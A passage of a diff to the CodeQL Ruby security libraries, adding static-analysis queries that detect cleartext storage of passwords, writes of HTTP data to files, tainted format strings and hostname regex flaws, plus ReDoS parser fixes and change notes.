-      name.regexpMatch(maybePassword()) and
-      exists(Assignment a |
-        this.asExpr().getExpr() = a.getRightOperand() and
-        a.getLeftOperand().getAVariable().getName() = name
-      )
-    }
-
-    override string describe() { result = "an assignment to " + name }
-  }
-
-  /** A parameter that may contain a password. */
-  private class ParameterPasswordSource extends Source {
-    private string name;
-
-    ParameterPasswordSource() {
-      name.regexpMatch(maybePassword()) and
-      not this instanceof NonCleartextPassword and
-      exists(Parameter p, LocalVariable v |
-        v = p.getAVariable() and
-        v.getName() = name and
-        this.asExpr().getExpr() = v.getAnAccess()
-      )
-    }
-
-    override string describe() { result = "a parameter " + name }
-  }
-
-  /** A call that might return a password. */
-  private class CallPasswordSource extends DataFlow::CallNode, Source {
-    private string name;
-
-    CallPasswordSource() {
-      name = this.getMethodName() and
-      name.regexpMatch("(?is)getPassword")
-    }
-
-    override string describe() { result = "a call to " + name }
-  }
-
  private string commonLogMethodName() {
    result = ["info", "debug", "warn", "warning", "error", "log"]
  }

-  /** Holds if `nodeFrom` taints `nodeTo`. */
-  predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
-    exists(string name, ElementReference ref, LocalVariable hashVar |
-      // from `hsh[password] = "changeme"` to a `hsh[password]` read
-      nodeFrom.(HashKeyWritePasswordSource).getName() = name and
-      nodeTo.asExpr().getExpr() = ref and
-      ref.getArgument(0).getConstantValue().getStringOrSymbol() = name and
-      nodeFrom.(HashKeyWritePasswordSource).getVariable() = hashVar and
-      ref.getReceiver().(VariableReadAccess).getVariable() = hashVar and
-      nodeFrom.asExpr().getASuccessor*() = nodeTo.asExpr()
-    )
-  }
-
  /**
   * A node representing an expression whose value is logged.
   */
--- a/ruby/ql/lib/codeql/ruby/security/CleartextStorageCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextStorageCustomizations.qll
@@ -0,0 +1,49 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * cleartext storage of sensitive information, as well as extension points for
+ * adding your own.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.Concepts
+private import internal.CleartextSources
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * cleartext storage of sensitive information, as well as extension points for
+ * adding your own.
+ */
+module CleartextStorage {
+  /**
+   * A data flow source for cleartext storage of sensitive information.
+   */
+  class Source = CleartextSources::Source;
+
+  /**
+   * A sanitizer for cleartext storage of sensitive information.
+   */
+  class Sanitizer = CleartextSources::Sanitizer;
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep = CleartextSources::isAdditionalTaintStep/2;
+
+  /**
+   * A data flow sink for cleartext storage of sensitive information.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A node representing data written to the filesystem.
+   */
+  private class FileSystemWriteAccessDataNodeAsSink extends Sink {
+    FileSystemWriteAccessDataNodeAsSink() { this = any(FileSystemWriteAccess write).getADataNode() }
+  }
+
+  /**
+   * A node representing data written to a persistent data store.
+   */
+  private class PersistentWriteAccessAsSink extends Sink {
+    PersistentWriteAccessAsSink() { this = any(PersistentWriteAccess write).getValue() }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/CleartextStorageQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/CleartextStorageQuery.qll
@@ -0,0 +1,33 @@
+/**
+ * Provides a taint-tracking configuration for "Clear-text storage of sensitive information".
+ *
+ * Note, for performance reasons: only import this file if
+ * `Configuration` is needed, otherwise `CleartextStorageCustomizations` should be
+ * imported instead.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.TaintTracking
+private import CleartextStorageCustomizations::CleartextStorage as CleartextStorage
+
+/**
+ * A taint-tracking configuration for detecting "Clear-text storage of sensitive information".
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "CleartextStorage" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof CleartextStorage::Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof CleartextStorage::Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node)
+    or
+    node instanceof CleartextStorage::Sanitizer
+  }
+
+  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+    CleartextStorage::isAdditionalTaintStep(nodeFrom, nodeTo)
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessCustomizations.qll
@@ -0,0 +1,34 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * writing user-controlled data to files, as well as extension points
+ * for adding your own.
+ */
+module HttpToFileAccess {
+  import HttpToFileAccessSpecific
+
+  /**
+   * A data flow source for writing user-controlled data to files.
+   */
+  abstract class Source extends DataFlow::Node { }
+
+  /**
+   * A data flow sink for writing user-controlled data to files.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A sanitizer for writing user-controlled data to files.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /** A sink that represents file access method (write, append) argument */
+  class FileAccessAsSink extends Sink {
+    FileAccessAsSink() { exists(FileSystemWriteAccess src | this = src.getADataNode()) }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessQuery.qll
@@ -0,0 +1,25 @@
+/**
+ * Provides a taint tracking configuration for reasoning about writing user-controlled data to files.
+ *
+ * Note, for performance reasons: only import this file if
+ * `HttpToFileAccess::Configuration` is needed, otherwise
+ * `HttpToFileAccessCustomizations` should be imported instead.
+ */
+
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * A taint tracking configuration for writing user-controlled data to files.
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "HttpToFileAccess" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node) or
+    node instanceof Sanitizer
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/security/HttpToFileAccessSpecific.qll
@@ -0,0 +1,21 @@
+/**
+ * Provides imports and classes needed for `HttpToFileAccessQuery` and `HttpToFileAccessCustomizations`.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.Concepts
+import codeql.ruby.TaintTracking
+private import HttpToFileAccessCustomizations::HttpToFileAccess
+
+/**
+ * An access to a user-controlled HTTP request input, considered as a flow source for writing user-controlled data to files
+ */
+private class RequestInputAccessAsSource extends Source instanceof HTTP::Server::RequestInputAccess {
+}
+
+/** A response from an outgoing HTTP request, considered as a flow source for writing user-controlled data to files. */
+private class HttpResponseAsSource extends Source {
+  HttpResponseAsSource() { this = any(HTTP::Client::Request r).getResponseBody() }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringCustomizations.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringCustomizations.qll
@@ -0,0 +1,43 @@
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * format injections, as well as extension points for adding your own.
+ */
+
+/**
+ * Provides default sources, sinks and sanitizers for reasoning about
+ * format injections, as well as extension points for adding your own.
+ */
+module TaintedFormatString {
+  import TaintedFormatStringSpecific
+
+  /**
+   * A data flow source for format injections.
+   */
+  abstract class Source extends DataFlow::Node { }
+
+  /**
+   * A data flow sink for format injections.
+   */
+  abstract class Sink extends DataFlow::Node { }
+
+  /**
+   * A sanitizer for format injections.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /** A source of remote user input, considered as a flow source for format injection. */
+  class RemoteSource extends Source instanceof RemoteFlowSource { }
+
+  /**
+   * A format argument to a printf-like function, considered as a flow sink for format injection.
+   */
+  class FormatSink extends Sink {
+    FormatSink() {
+      exists(PrintfStyleCall printf |
+        this = printf.getFormatString() and
+        // exclude trivial case where there are no arguments to interpolate
+        exists(printf.getFormatArgument(_))
+      )
+    }
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringQuery.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringQuery.qll
@@ -0,0 +1,27 @@
+/**
+ * Provides a taint-tracking configuration for reasoning about format
+ * injections.
+ *
+ *
+ * Note, for performance reasons: only import this file if
+ * `TaintedFormatString::Configuration` is needed, otherwise
+ * `TaintedFormatStringCustomizations` should be imported instead.
+ */
+
+private import TaintedFormatStringCustomizations::TaintedFormatString
+
+/**
+ * A taint-tracking configuration for format injections.
+ */
+class Configuration extends TaintTracking::Configuration {
+  Configuration() { this = "TaintedFormatString" }
+
+  override predicate isSource(DataFlow::Node source) { source instanceof Source }
+
+  override predicate isSink(DataFlow::Node sink) { sink instanceof Sink }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    super.isSanitizer(node) or
+    node instanceof Sanitizer
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringSpecific.qll
+++ b/ruby/ql/lib/codeql/ruby/security/TaintedFormatStringSpecific.qll
@@ -0,0 +1,71 @@
+/**
+ * Provides Ruby-specific imports and classes needed for `TaintedFormatStringQuery` and `TaintedFormatStringCustomizations`.
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.dataflow.RemoteFlowSources
+import codeql.ruby.ApiGraphs
+import codeql.ruby.TaintTracking
+private import codeql.ruby.frameworks.Files::IO
+private import codeql.ruby.controlflow.CfgNodes
+
+/**
+ * A call to `printf` or `sprintf`.
+ */
+abstract class PrintfStyleCall extends DataFlow::CallNode {
+  // We assume that most printf-like calls have the signature f(format_string, args...)
+  /**
+   * Gets the format string of this call.
+   */
+  DataFlow::Node getFormatString() { result = this.getArgument(0) }
+
+  /**
+   * Gets then `n`th formatted argument of this call.
+   */
+  DataFlow::Node getFormatArgument(int n) { n >= 0 and result = this.getArgument(n + 1) }
+}
+
+/**
+ * A call to `Kernel.printf`.
+ */
+class KernelPrintfCall extends PrintfStyleCall {
+  KernelPrintfCall() {
+    this = API::getTopLevelMember("Kernel").getAMethodCall("printf")
+    or
+    this.asExpr().getExpr() instanceof UnknownMethodCall and
+    this.getMethodName() = "printf"
+  }
+
+  // Kernel#printf supports two signatures:
+  //   printf(io, string, ...)
+  //   printf(string, ...)
+  override DataFlow::Node getFormatString() {
+    // Because `printf` has two different signatures, we can't be sure which
+    // argument is the format string, so we use a heuristic:
+    // If the first argument has a string value, then we assume it is the format string.
+    // Otherwise we treat both the first and second args as the format string.
+    if this.getArgument(0).getExprNode().getConstantValue().isString(_)
+    then result = this.getArgument(0)
+    else result = this.getArgument([0, 1])
+  }
+}
+
+/**
+ * A call to `Kernel.sprintf`.
+ */
+class KernelSprintfCall extends PrintfStyleCall {
+  KernelSprintfCall() {
+    this = API::getTopLevelMember("Kernel").getAMethodCall("sprintf")
+    or
+    this.asExpr().getExpr() instanceof UnknownMethodCall and
+    this.getMethodName() = "sprintf"
+  }
+}
+
+/**
+ * A call to `IO#printf`.
+ */
+class IOPrintfCall extends PrintfStyleCall {
+  IOPrintfCall() { this.getReceiver() instanceof IOInstance and this.getMethodName() = "printf" }
+}
--- a/ruby/ql/lib/codeql/ruby/security/internal/CleartextSources.qll
+++ b/ruby/ql/lib/codeql/ruby/security/internal/CleartextSources.qll
@@ -0,0 +1,275 @@
+/**
+ * Provides default sources and sanitizers for reasoning about data flow from
+ * sources of sensitive information, as well as extension points for adding
+ * your own sources and sanitizers.
+ */
+
+private import ruby
+private import codeql.ruby.DataFlow
+private import codeql.ruby.TaintTracking::TaintTracking
+private import codeql.ruby.dataflow.RemoteFlowSources
+private import SensitiveDataHeuristics::HeuristicNames
+private import codeql.ruby.CFG
+private import codeql.ruby.dataflow.SSA
+
+/**
+ * Provides default sources and sanitizers for reasoning about data flow from
+ * sources of sensitive information, as well as extension points for adding
+ * your own sources and sanitizers.
+ */
+module CleartextSources {
+  /**
+   * A data flow source of cleartext sensitive information.
+   */
+  abstract class Source extends DataFlow::Node {
+    /** Gets a string that describes the type of this data flow source. */
+    abstract string describe();
+  }
+
+  /**
+   * A sanitizer for cleartext sensitive information.
+   */
+  abstract class Sanitizer extends DataFlow::Node { }
+
+  /**
+   * Holds if `re` may be a regular expression that can be used to sanitize
+   * sensitive data with a call to `sub`.
+   */
+  private predicate effectiveSubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
+    re.getConstantValue().getStringOrSymbol().matches([".*", ".+"])
+  }
+
+  /**
+   * Holds if `re` may be a regular expression that can be used to sanitize
+   * sensitive data with a call to `gsub`.
+   */
+  private predicate effectiveGsubRegExp(CfgNodes::ExprNodes::RegExpLiteralCfgNode re) {
+    re.getConstantValue().getStringOrSymbol().matches(".")
+  }
+
+  /**
+   * A call to `sub`/`sub!` or `gsub`/`gsub!` that seems to mask sensitive information.
+   */
+  private class MaskingReplacerSanitizer extends Sanitizer, DataFlow::CallNode {
+    MaskingReplacerSanitizer() {
+      exists(CfgNodes::ExprNodes::RegExpLiteralCfgNode re |
+        re = this.getArgument(0).asExpr() and
+        (
+          this.getMethodName() = ["sub", "sub!"] and effectiveSubRegExp(re)
+          or
+          this.getMethodName() = ["gsub", "gsub!"] and effectiveGsubRegExp(re)
+        )
+      )
+    }
+  }
+
+  /**
+   * Like `MaskingReplacerSanitizer` but updates the receiver for methods that
+   * sanitize the receiver.
+   * Taint is thereby cleared for any subsequent read.
+   */
+  private class InPlaceMaskingReplacerSanitizer extends Sanitizer {
+    InPlaceMaskingReplacerSanitizer() {
+      exists(MaskingReplacerSanitizer m | m.getMethodName() = ["gsub!", "sub!"] |
+        m.getReceiver() = this
+      )
+    }
+  }
+
+  /**
+   * Holds if `name` is for a method or variable that appears, syntactically, to
+   * not be sensitive.
+   */
+  bindingset[name]
+  predicate nameIsNotSensitive(string name) {
+    name.regexpMatch(notSensitiveRegexp()) and
+    // By default `notSensitiveRegexp()` includes some false positives for
+    // common ruby method names that are not necessarily non-sensitive.
+    // We explicitly exclude element references, element assignments, and
+    // mutation methods.
+    not name = ["[]", "[]="] and
+    not name.matches("%!")
+  }
+
+  /**
+   * A call that might obfuscate a password, for example through hashing.
+   */
+  private class ObfuscatorCall extends Sanitizer, DataFlow::CallNode {
+    ObfuscatorCall() { nameIsNotSensitive(this.getMethodName()) }
+  }
+
+  /**
+   * A data flow node that does not contain a clear-text password, according to its syntactic name.
+   */
+  private class NameGuidedNonCleartextPassword extends NonCleartextPassword {
+    NameGuidedNonCleartextPassword() {
+      exists(string name | nameIsNotSensitive(name) |
+        // accessing a non-sensitive variable
+        this.asExpr().getExpr().(VariableReadAccess).getVariable().getName() = name
+        or
+        // dereferencing a non-sensitive field
+        this.asExpr()
+            .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
+            .getArgument(0)
+            .getConstantValue()
+            .getStringOrSymbol() = name
+        or
+        // calling a non-sensitive method
+        this.(DataFlow::CallNode).getMethodName() = name
+      )
+      or
+      // avoid i18n strings
+      this.asExpr()
+          .(CfgNodes::ExprNodes::ElementReferenceCfgNode)
+          .getReceiver()
+          .getConstantValue()
+          .getStringOrSymbol()
+          .regexpMatch("(?is).*(messages|strings).*")
+    }
+  }
+
+  /**
+   * A data flow node that receives flow that is not a clear-text password.
+   */
+  class NonCleartextPasswordFlow extends NonCleartextPassword {
+    NonCleartextPasswordFlow() {
+      any(NonCleartextPassword other).(DataFlow::LocalSourceNode).flowsTo(this)
+    }
+  }
+
+  /**
+   * A data flow node that does not contain a clear-text password.
+   */
+  abstract private class NonCleartextPassword extends DataFlow::Node { }
+
+  // `writeNode` assigns pair with key `name` to `val`
+  private predicate hashKeyWrite(DataFlow::CallNode writeNode, string name, DataFlow::Node val) {
+    writeNode.asExpr().getExpr() instanceof SetterMethodCall and
+    // hash[name]
+    writeNode.getArgument(0).asExpr().getConstantValue().getStringOrSymbol() = name and
+    // val
+    writeNode.getArgument(1).asExpr().(CfgNodes::ExprNodes::AssignExprCfgNode).getRhs() =
+      val.asExpr()
+  }
+
+  /**
+   * A write to a hash entry with a value that may contain password information.
+   */
+  private class HashKeyWritePasswordSource extends Source {
+    private string name;
+    private DataFlow::ExprNode recv;
+
+    HashKeyWritePasswordSource() {
+      exists(DataFlow::Node val |
+        name.regexpMatch(maybePassword()) and
+        not nameIsNotSensitive(name) and
+        // avoid safe values assigned to presumably unsafe names
+        not val instanceof NonCleartextPassword and
+        (
+          // hash[name] = val
+          hashKeyWrite(this, name, val) and
+          recv = this.(DataFlow::CallNode).getReceiver()
+        )
+      )
+    }
+
+    override string describe() { result = "a write to " + name }
+
+    /** Gets the name of the key */
+    string getName() { result = name }
+
+    /**
+     * Gets the name of the hash variable that this password source is assigned
+     * to, if applicable.
+     */
+    LocalVariable getVariable() {
+      result = recv.getExprNode().getExpr().(VariableReadAccess).getVariable()
+    }
+  }
+
+  /**
+   * A hash literal with an entry that may contain a password
+   */
+  private class HashLiteralPasswordSource extends Source {
+    private string name;
+
+    HashLiteralPasswordSource() {
+      exists(DataFlow::Node val, CfgNodes::ExprNodes::HashLiteralCfgNode lit |
+        name.regexpMatch(maybePassword()) and
+        not nameIsNotSensitive(name) and
+        // avoid safe values assigned to presumably unsafe names
+        not val instanceof NonCleartextPassword and
+        // hash = { name: val }
+        exists(CfgNodes::ExprNodes::PairCfgNode p |
+          this.asExpr() = lit and p = lit.getAKeyValuePair()
+        |
+          p.getKey().getConstantValue().getStringOrSymbol() = name and
+          p.getValue() = val.asExpr()
+        )
+      )
+    }
+
+    override string describe() { result = "a write to " + name }
+  }
+
+  /** An assignment that may assign a password to a variable */
+  private class AssignPasswordVariableSource extends Source {
+    string name;
+
+    AssignPasswordVariableSource() {
+      // avoid safe values assigned to presumably unsafe names
+      not this instanceof NonCleartextPassword and
+      name.regexpMatch(maybePassword()) and
+      not nameIsNotSensitive(name) and
+      exists(Assignment a |
+        this.asExpr().getExpr() = a.getRightOperand() and
+        a.getLeftOperand().getAVariable().getName() = name
+      )
+    }
+
+    override string describe() { result = "an assignment to " + name }
+  }
+
+  /** A parameter that may contain a password. */
+  private class ParameterPasswordSource extends Source {
+    private string name;
+
+    ParameterPasswordSource() {
+      name.regexpMatch(maybePassword()) and
+      not nameIsNotSensitive(name) and
+      not this instanceof NonCleartextPassword and
+      exists(Parameter p, LocalVariable v |
+        v = p.getAVariable() and
+        v.getName() = name and
+        this.asExpr().getExpr() = v.getAnAccess()
+      )
+    }
+
+    override string describe() { result = "a parameter " + name }
+  }
+
+  /** A call that might return a password. */
+  private class CallPasswordSource extends DataFlow::CallNode, Source {
+    private string name;
+
+    CallPasswordSource() {
+      name = this.getMethodName() and
+      name.regexpMatch("(?is)getPassword")
+    }
+
+    override string describe() { result = "a call to " + name }
+  }
+
+  /** Holds if `nodeFrom` taints `nodeTo`. */
+  predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+    exists(string name, ElementReference ref, LocalVariable hashVar |
+      // from `hsh[password] = "changeme"` to a `hsh[password]` read
+      nodeFrom.(HashKeyWritePasswordSource).getName() = name and
+      nodeTo.asExpr().getExpr() = ref and
+      ref.getArgument(0).getConstantValue().getStringOrSymbol() = name and
+      nodeFrom.(HashKeyWritePasswordSource).getVariable() = hashVar and
+      ref.getReceiver().(VariableReadAccess).getVariable() = hashVar and
+      nodeFrom.asExpr().getASuccessor*() = nodeTo.asExpr()
+    )
+  }
+}
--- a/ruby/ql/lib/codeql/ruby/security/internal/SensitiveDataHeuristics.qll
+++ b/ruby/ql/lib/codeql/ruby/security/internal/SensitiveDataHeuristics.qll
@@ -98,7 +98,8 @@ module HeuristicNames {
   * suggesting nouns within the string do not represent the meaning of the whole string (e.g. a URL or a SQL query).
   */
  string notSensitiveRegexp() {
-    result = "(?is).*([^\\w$.-]|redact|censor|obfuscate|hash|md5|sha|((?<!un)(en))?(crypt|code)).*"
+    result =
+      "(?is).*([^\\w$.-]|redact|censor|obfuscate|hash|md5|sha|random|((?<!un)(en))?(crypt|code)).*"
  }

  /**
--- a/ruby/ql/lib/codeql/ruby/security/performance/ExponentialBackTracking.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/ExponentialBackTracking.qll
@@ -1,9 +1,5 @@
-private import ReDoSUtil
-private import RegExpTreeView
-private import codeql.Locations
-
-/*
- * This query implements the analysis described in the following two papers:
+/**
+ * This library implements the analysis described in the following two papers:
 *
 *   James Kirrage, Asiri Rathnayake, Hayo Thielecke: Static Analysis for
 *     Regular Expression Denial-of-Service Attacks. NSS 2013.
@@ -31,9 +27,9 @@ private import codeql.Locations
 * condition is equivalent to saying that `(q, q)` is reachable from `(r1, r2)`
 * in the product NFA.
 *
- * This is what the query does. It makes a simple attempt to construct a
+ * This is what the library does. It makes a simple attempt to construct a
 * prefix `v` leading into `q`, but only to improve the alert message.
- * And the query tries to prove the existence of a suffix that ensures
+ * And the library tries to prove the existence of a suffix that ensures
 * rejection. This check might fail, which can cause false positives.
 *
 * Finally, sometimes it depends on the translation whether the NFA generated
@@ -41,7 +37,7 @@ private import codeql.Locations
 * particular translation, which may result in false positives or negatives
 * relative to some particular JavaScript engine.
 *
- * More precisely, the query constructs an NFA from a regular expression `r`
+ * More precisely, the library constructs an NFA from a regular expression `r`
 * as follows:
 *
 *   * Every sub-term `t` gives rise to an NFA state `Match(t,i)`, representing
@@ -66,6 +62,8 @@ private import codeql.Locations
 *     a suffix `x` (possible empty) that is most likely __not__ accepted.
 */

+import ReDoSUtil
+
 /**
 * Holds if state `s` might be inside a backtracking repetition.
 */
@@ -90,18 +88,19 @@ private class MaybeBacktrackingRepetition extends InfiniteRepetitionQuantifier {

 /**
 * A state in the product automaton.
- *
- * We lazily only construct those states that we are actually
- * going to need: `(q, q)` for every fork state `q`, and any
- * pair of states that can be reached from a pair that we have
- * already constructed. To cut down on the number of states,
- * we only represent states `(q1, q2)` where `q1` is lexicographically
- * no bigger than `q2`.
- *
- * States are only constructed if both states in the pair are
- * inside a repetition that might backtrack.
 */
 private newtype TStatePair =
+  /**
+   * We lazily only construct those states that we are actually
+   * going to need: `(q, q)` for every fork state `q`, and any
+   * pair of states that can be reached from a pair that we have
+   * already constructed. To cut down on the number of states,
+   * we only represent states `(q1, q2)` where `q1` is lexicographically
+   * no bigger than `q2`.
+   *
+   * States are only constructed if both states in the pair are
+   * inside a repetition that might backtrack.
+   */
  MkStatePair(State q1, State q2) {
    isFork(q1, _, _, _, _) and q2 = q1
    or
--- a/ruby/ql/lib/codeql/ruby/security/performance/ParseRegExp.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/ParseRegExp.qll
@@ -8,9 +8,9 @@
 private import codeql.ruby.ast.Literal as AST
 private import codeql.Locations
 private import codeql.ruby.DataFlow
-private import codeql.ruby.TaintTracking
-private import codeql.ruby.typetracking.TypeTracker
+private import codeql.ruby.controlflow.CfgNodes
 private import codeql.ruby.ApiGraphs
+private import codeql.ruby.dataflow.internal.tainttrackingforlibraries.TaintTrackingImpl

 /**
 * A `StringlikeLiteral` containing a regular expression term, that is, either
@@ -480,6 +480,7 @@ abstract class RegExp extends AST::StringlikeLiteral {
  /** Gets the number of the group in start,end */
  int getGroupNumber(int start, int end) {
    this.group(start, end) and
+    not this.nonCapturingGroupStart(start, _) and
    result =
      count(int i | this.group(i, _) and i < start and not this.nonCapturingGroupStart(i, _)) + 1
  }
@@ -583,7 +584,7 @@ abstract class RegExp extends AST::StringlikeLiteral {
  private predicate nonCapturingGroupStart(int start, int end) {
    this.isGroupStart(start) and
    this.getChar(start + 1) = "?" and
-    this.getChar(start + 2) = ":" and
+    this.getChar(start + 2) = [":", "=", "<", "!", "#"] and
    end = start + 3
  }

@@ -992,25 +993,35 @@ private predicate isInterpretedAsRegExp(DataFlow::Node source) {
  // The argument of a call that coerces the argument to a regular expression.
  exists(DataFlow::CallNode mce |
    mce.getMethodName() = ["match", "match?"] and
-    source = mce.getArgument(0)
+    source = mce.getArgument(0) and
+    // exclude https://ruby-doc.org/core-2.4.0/Regexp.html#method-i-match
+    not mce.getReceiver().asExpr().getExpr() instanceof AST::RegExpLiteral
  )
 }

-/**
- * Gets a node whose value may flow (inter-procedurally) to `re`, where it is interpreted
- * as a part of a regular expression.
- */
-private DataFlow::Node regExpSource(DataFlow::Node re, TypeBackTracker t) {
-  t.start() and
-  re = result and
-  isInterpretedAsRegExp(result)
-  or
-  exists(TypeBackTracker t2, DataFlow::Node succ | succ = regExpSource(re, t2) |
-    t2 = t.smallstep(result, succ)
-    or
-    TaintTracking::localTaintStep(result, succ) and
-    t = t2
-  )
+private class RegExpConfiguration extends Configuration {
+  RegExpConfiguration() { this = "RegExpConfiguration" }
+
+  override predicate isSource(DataFlow::Node source) {
+    source.asExpr() =
+      any(ExprCfgNode e |
+        e.getConstantValue().isString(_) and
+        not e instanceof ExprNodes::VariableReadAccessCfgNode and
+        not e instanceof ExprNodes::ConstantReadAccessCfgNode
+      )
+  }
+
+  override predicate isSink(DataFlow::Node sink) { isInterpretedAsRegExp(sink) }
+
+  override predicate isSanitizer(DataFlow::Node node) {
+    // stop flow if `node` is receiver of
+    // https://ruby-doc.org/core-2.4.0/String.html#method-i-match
+    exists(DataFlow::CallNode mce |
+      mce.getMethodName() = ["match", "match?"] and
+      node = mce.getReceiver() and
+      mce.getArgument(0).asExpr().getExpr() instanceof AST::RegExpLiteral
+    )
+  }
 }

 /**
@@ -1018,4 +1029,6 @@ private DataFlow::Node regExpSource(DataFlow::Node re, TypeBackTracker t) {
 * as a part of a regular expression.
 */
 cached
-DataFlow::Node regExpSource(DataFlow::Node re) { result = regExpSource(re, TypeBackTracker::end()) }
+DataFlow::Node regExpSource(DataFlow::Node re) {
+  exists(RegExpConfiguration c | c.hasFlow(result, re))
+}
--- a/ruby/ql/lib/codeql/ruby/security/performance/RegExpTreeView.qll
+++ b/ruby/ql/lib/codeql/ruby/security/performance/RegExpTreeView.qll
@@ -60,6 +60,19 @@ module RegExpFlags {
  }
 }

+/**
+ * Provides utility predicates related to regular expressions.
+ */
+module RegExpPatterns {
+  /**
+   * Gets a pattern that matches common top-level domain names in lower case.
+   */
+  string getACommonTld() {
+    // according to ranking by http://google.com/search?q=site:.<<TLD>>
+    result = "(?:com|org|edu|gov|uk|net|io)(?![a-z0-9])"
+  }
+}
+
 /**
 * An element containing a regular expression term, that is, either
 * a string literal (parsed as a regular expression)
@@ -385,6 +398,8 @@ class RegExpAlt extends RegExpTerm, TRegExpAlt {
  override string getAPrimaryQlClass() { result = "RegExpAlt" }
 }

+class RegExpCharEscape = RegExpEscape;
+
 class RegExpEscape extends RegExpNormalChar {
  RegExpEscape() { re.escapedCharacter(start, end) }

@@ -593,6 +608,9 @@ class RegExpGroup extends RegExpTerm, TRegExpGroup {
   */
  int getNumber() { result = re.getGroupNumber(start, end) }

+  /** Holds if this is a capture group. */
+  predicate isCapture() { exists(this.getNumber()) }
+
  /** Holds if this is a named capture group. */
  predicate isNamed() { exists(this.getName()) }

--- a/ruby/ql/src/change-notes/2022-02-10-incomplete-hostname-regexp.md
+++ b/ruby/ql/src/change-notes/2022-02-10-incomplete-hostname-regexp.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/incomplete-hostname-regexp`. The query finds instances where a hostname is incompletely sanitized due to an unescaped character in a regular expression.
--- a/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
+++ b/ruby/ql/src/change-notes/2022-02-23-rb-http-to-file-access.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/http-to-file-access`. The query finds cases where data from remote user input is written to a file.
--- a/ruby/ql/src/change-notes/2022-03-05-rb-clear-text-storage-sensitive-data.md
+++ b/ruby/ql/src/change-notes/2022-03-05-rb-clear-text-storage-sensitive-data.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/clear-text-storage-sensitive-data`. The query finds cases where sensitive information, such as user credentials, are stored as cleartext.
--- a/ruby/ql/src/change-notes/2022-03-10-rb-tainted-format-string.md
+++ b/ruby/ql/src/change-notes/2022-03-10-rb-tainted-format-string.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Added a new query, `rb/http-tainted-format-string`. The query finds cases where data from remote user input is used in a string formatting method in a way that allows arbitrary format specifiers to be inserted.
--- a/ruby/ql/src/queries/security/cwe-020/HostnameRegexpShared.qll
+++ b/ruby/ql/src/queries/security/cwe-020/HostnameRegexpShared.qll
@@ -0,0 +1,202 @@
+/**
+ * Provides predicates for reasoning about regular expressions
+ * that match URLs and hostname patterns.
+ */
+
+private import HostnameRegexpSpecific
+
+/**
+ * Holds if the given constant is unlikely to occur in the origin part of a URL.
+ */
+predicate isConstantInvalidInsideOrigin(RegExpConstant term) {
+  // Look for any of these cases:
+  // - A character that can't occur in the origin
+  // - Two dashes in a row
+  // - A colon that is not part of port or scheme separator
+  // - A slash that is not part of scheme separator
+  term.getValue().regexpMatch(".*(?:[^a-zA-Z0-9.:/-]|--|:[^0-9/]|(?<![/:]|^)/).*")
+}
+
+/** Holds if `term` is a dot constant of form `\.` or `[.]`. */
+predicate isDotConstant(RegExpTerm term) {
+  term.(RegExpCharEscape).getValue() = "."
+  or
+  exists(RegExpCharacterClass cls |
+    term = cls and
+    not cls.isInverted() and
